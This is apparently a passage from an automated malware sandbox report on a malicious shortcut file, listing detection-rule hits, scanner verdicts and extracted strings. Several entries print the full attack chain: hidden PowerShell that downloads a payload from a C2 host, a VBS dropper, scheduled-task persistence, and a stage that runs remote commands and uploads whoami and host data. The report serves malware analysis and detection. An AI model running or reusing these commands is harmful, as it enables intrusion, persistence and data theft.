$dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6928, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, ProcessId: 2472, ProcessName: schtasks.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 6908, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6908, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7236, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: Xkci1BfrmX.lnkReversingLabs: Detection: 18%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
              Machine Learning detection for sample
              Source: Xkci1BfrmX.lnkJoe Sandbox ML: detected
              Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.1900173496.000001B6FA7A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.2769404987.000002536A4DB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kem.pdbE source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.pdbpdbtem.pdbdo source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Core.pdb= source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2769404987.000002536A508000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2769404987.000002536A4DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4194744188.000001ABEDEA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@/) source: powershell.exe, 00000005.00000002.2771031189.000002536A6A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ows\dll\System.Core.pdbU source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdbC source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000012.00000002.4197164578.000001ABEE14D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbDd source: powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbon FilZ source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbh source: powershell.exe, 00000012.00000002.4194744188.000001ABEDEA1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4197164578.000001ABEE16A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDI source: powershell.exe, 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 089\System.Core.pdb ComC source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Core.pdbam Fi source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000005.00000002.2771031189.000002536A6B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.resources.pdbrs source: powershell.exe, 00000005.00000002.2771031189.000002536A730000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000012.00000002.4197164578.000001ABEE14D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb.microso2 source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbMPUTER source: powershell.exe, 00000012.00000002.4197164578.000001ABEE18D000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 23.56.162.185 23.56.162.185
              Source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: svchost.exe, 00000007.00000002.3506944741.000001D5D0A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 00000007.00000003.1843180846.000001D5D09A8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000007.00000003.1843180846.000001D5D09A8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000007.00000003.1843180846.000001D5D09A8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000007.00000003.1843180846.000001D5D09DD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000000.00000002.1894925547.000001B6F251F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1894925547.000001B6F2662000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.00000253101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2759329285.0000025310085000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E3AFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.00000253016D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD6610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onedriveview.shop
              Source: powershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E24B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD5B67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2708175995.000002530022E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.1899915520.000001B6FA6A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
              Source: powershell.exe, 00000012.00000002.4143788357.000001ABD5B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000000.00000002.1848046574.000001B6E24B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2708175995.0000025300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.4143788357.000001ABD5B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2708175995.0000025301A62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
